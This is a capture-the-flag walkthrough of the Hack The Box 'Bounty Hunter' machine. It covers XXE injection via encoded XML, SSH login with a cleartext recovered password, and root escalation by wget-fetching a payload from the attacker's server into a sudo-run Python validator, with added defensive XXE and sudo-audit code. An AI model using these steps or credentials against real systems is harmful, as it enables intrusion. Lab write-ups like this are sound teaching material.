Bounty Hunter Hack The Box Walkthrough




In this post, we are going to walk through the Bounty Hunter Hack The Box machine and capture both the user flag and the root flag...



First, connect to your Hack The Box VPN and open the machine's IP address, 10.10.11.100, in your browser.


ENUMERATION:




First, run an Nmap scan using the command below:


STEP 1: nmap -sC -sV 10.10.11.100


The result is shown below:

[Image: Nmap scan result]

In this result, the interesting service is SSH on port 22.


Next, we brute-force the web directories with gobuster to find anything interesting:


STEP 2: gobuster dir -u http://10.10.11.100/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt


The gobuster result:


[Image: gobuster result]


In the gobuster result, you can see a lot of hidden directories...

Next, go to the webpage and click the Portal tab. This section says the portal is under development, and there is a "click here" button.




Click the button it will

Further, I tried several SQL injection attempts, but nothing worked.


SCANNING:


Next, I intercepted the webpage's request with Burp Suite (shown in the image below).

[Image: request intercepted in Burp Suite]


And sent the request to the Burp Suite Repeater...

[Image: request in Burp Suite Repeater]


In this request, the data is encoded as base64 and then URL-encoded.


So we decode it using the CyberChef website (link below).


We decode it on that website (the instructions are shown in the image below).


Now it has been decoded:

[Image: decoded request data in CyberChef]


The decoded data looks like an XML document, and using the website below I found that it is vulnerable to XXE (XML External Entity injection)...


On that website you can study XXE, i.e. XML vulnerabilities, in more detail...


Now we inject the XXE payload into the XML document, encode it the same way as before and send it to the web application...


You can download the payload using the link below.


Now download the payload and inject it into the XML document (image shown below).


Next, encode the document using CyberChef; the encoding must be base64 followed by URL encoding (shown in the image below).


[Image: encoding the payload in CyberChef]


Copy the encoded output and paste it into the data field of the Burp Suite request (shown in the image below).


Now send the request and you get a response... in this response you can see some encoded data (shown in the image below).


Decoding it shows a password... but when I tried this username and password, it did not work. Using another payload, I got the password for another user, and that one works...







You can download the second payload using the link below.


Copy the payload, paste it into the XML document, and encode the document as shown in the image below...


Next, copy the encoded output, paste it into the request, and you get the response...

In this response, you can see some encoded data (shown in the image below).


Next, decode this data as shown in the image below.


In the decoded output, you can see the user, which is development...


Now we have the username: development

Password: m19RoAU0hP41A1sTsq6K
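The XXE step above works because the application decodes the submitted XML and parses it with external entities enabled. As an added defender-side example (not code from the original post, nor the machine's own code), here is how a server could undo the same base64-plus-URL layering and then refuse any document that carries a DTD before it ever reaches the XML parser. The report field names and the sample documents are constructed for the example.

```python
import base64
import re
import urllib.parse
import xml.etree.ElementTree as ET

# XXE needs an entity declaration, and entity declarations live only inside a
# DOCTYPE, so the cheapest robust defence is to refuse DTDs altogether.
DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def encode_request_data(xml_text: str) -> str:
    """base64-encode, then URL-encode: the layering the post describes."""
    b64 = base64.b64encode(xml_text.encode("utf-8")).decode("ascii")
    return urllib.parse.quote(b64, safe="")


def decode_request_data(encoded: str) -> str:
    """Undo the layers in reverse order: URL-decode first, then base64-decode."""
    return base64.b64decode(urllib.parse.unquote(encoded)).decode("utf-8")


def parse_report(xml_text: str) -> dict:
    """Parse a submitted bug report, rejecting any document that has a DTD.

    Raises ValueError when a DTD is present; otherwise returns a {tag: text}
    mapping of the root element's children.
    """
    if DTD_MARKER.search(xml_text):
        raise ValueError("DTD or entity declaration in submitted XML; rejected")
    root = ET.fromstring(xml_text)
    return {child.tag: (child.text or "").strip() for child in root}


def handle_submission(encoded: str) -> dict:
    """What the server side would do with the encoded form field."""
    return parse_report(decode_request_data(encoded))


# Constructed sample inputs (assumed report layout, not taken from the machine).
BENIGN_REPORT = (
    "<bugreport><title>Open redirect</title>"
    "<cwe>CWE-601</cwe><reward>100</reward></bugreport>"
)
# A document that declares an external entity; the harmless /dev/null target
# is enough to show that the DTD itself is what gets rejected.
DTD_REPORT = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE bugreport [<!ENTITY ext SYSTEM "file:///dev/null">]>'
    "<bugreport><title>&ext;</title></bugreport>"
)

if __name__ == "__main__":
    print(handle_submission(encode_request_data(BENIGN_REPORT)))
    try:
        handle_submission(encode_request_data(DTD_REPORT))
    except ValueError as err:
        print("rejected:", err)
```

The check runs on the decoded text before parsing, which is the same rule the defusedxml library applies with forbid_dtd=True; lxml users should also build their parser with resolve_entities=False. Rejecting the DTD outright is simpler than trying to enumerate dangerous entity types.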



Now that we have the username and password, we log in through SSH using the command below:


STEP 3: ssh development@10.10.11.100

It will ask for the password, so enter m19RoAU0hP41A1sTsq6K


BOOOOOOOOOOOOOOOOOOMMMMMMMM!!!!!


Now you get the shell.....

[Image: SSH shell as development]


STEP 4: ls


hurrrrrrrrrrrrrrrrrrrrrh!!!!


Now you get the user flag, which is in user.txt:


STEP 5: cat user.txt

[Image: user flag]


Now that we have the user flag, next we are going to take the root flag...



PRIVILEGE ESCALATION:


STEP 6: sudo -l


Now we get something, which is shown in the image below.

[Image: sudo -l output]


Next, we are going to exploit this ticket validator...


To exploit it, we first want to read the program using the command below:


STEP 7: cat /opt/skytrain_inc/ticketValidator.py


From this code you can see what the program does... it only accepts .md files; a file with any other extension will not work...

So we are going to write the malicious code in a file with the .md extension, e.g. tamil.md
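The root step that follows hinges on the sudo rule revealed by sudo -l: an interpreter (/usr/bin/python3.8) running a script that reads a file path typed by the user, so whatever that script does with the file happens as root, and a check on the file's extension is no barrier. As an added example from the administrator's side (not code from the original post or the machine), here is a small audit that parses sudo -l style output and flags such rules. The sample output is constructed; only the ticketValidator rule is taken from this writeup, and HOSTNAME is a placeholder.

```python
import re

# Constructed sample in the shape of "sudo -l" output. Only the ticketValidator
# line comes from the writeup; the hostname and the other two rules are made up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for development on HOSTNAME:
    env_reset, mail_badpass

User development may run the following commands on HOSTNAME:
    (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (ALL) /bin/bash
"""

# One sudo rule: "(runas) [TAG: ...] /absolute/command [args]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$"
)
# Interpreters and shells: the real program is whatever they are told to run.
INTERPRETER_RE = re.compile(r"/(python[0-9.]*|perl|ruby|node|bash|sh|dash|zsh)$")


def parse_rules(sudo_l_output: str) -> list:
    """Extract the command rules from sudo -l output, ignoring the preamble."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m is None:
            continue
        rules.append({
            "runas": m["runas"],
            "nopasswd": "NOPASSWD:" in m["tags"],
            "cmd": m["cmd"],
            "args": m["args"].strip(),
        })
    return rules


def assess(rule: dict) -> list:
    """Return the reasons a rule deserves review (empty list means none found)."""
    reasons = []
    if INTERPRETER_RE.search(rule["cmd"]):
        # A fixed script argument does not help: the script's input handling
        # becomes root's attack surface, and a bare shell needs no script at all.
        reasons.append("interpreter or shell as the sudo command")
    if rule["nopasswd"]:
        reasons.append("NOPASSWD removes the re-authentication step")
    return reasons


def audit(sudo_l_output: str) -> list:
    """Pair every parsed rule with its findings, keeping only flagged rules."""
    return [(r, assess(r)) for r in parse_rules(sudo_l_output) if assess(r)]


if __name__ == "__main__":
    for rule, reasons in audit(SAMPLE_SUDO_L):
        print(f"{rule['cmd']} {rule['args']} (as {rule['runas']})")
        for reason in reasons:
            print("   -", reason)
```

The fix on the administrator's side is to grant sudo on a purpose-built, non-writable wrapper that validates its input, rather than on the interpreter itself; the audit only surfaces the rules worth that conversation.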



You can download the payload script using the link below.


After downloading the payload, rename the Python file to a .md file (tamil.md) and move into the tmp folder on the target as follows.


First, go back one directory with the command cd ..


STEP 8: cd tmp


Transfer the payload using the commands below.


First, start a Python web server on your local (attacking) machine using the command below:


STEP 9: python3 -m http.server 6060


Then, on the target, fetch the file from your local machine (replace <your-VPN-IP> with your own machine's address on the Hack The Box VPN):


STEP 10: wget http://<your-VPN-IP>:6060/tamil.md


Now the payload has been transferred to the folder...








Next, enter the commands below:

STEP 11: chmod 777 tamil.md


STEP 12: sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py


Now it will ask for the path of the file...


So enter the path of the file:


STEP 13: /tmp/tamil.md


boooooooooooooommmmm !!!!!


Now you get the root shell.


STEP 14: cd ..


STEP 15: cd root


STEP 16: cat root.txt


Now you get the root flag, which is in root.txt.


I hope you understood this article. Please subscribe to my website and support us by donating using the link below.









3 Comments

  1. How did you get the path tracker_diRbPr00f3l4.php??

  2. The payload isn't downloading??

  3. Hello, excuse the question, but recently they changed the key of this virtual machine. I already decrypted it, but when I enter it, it bounces me back as wrong.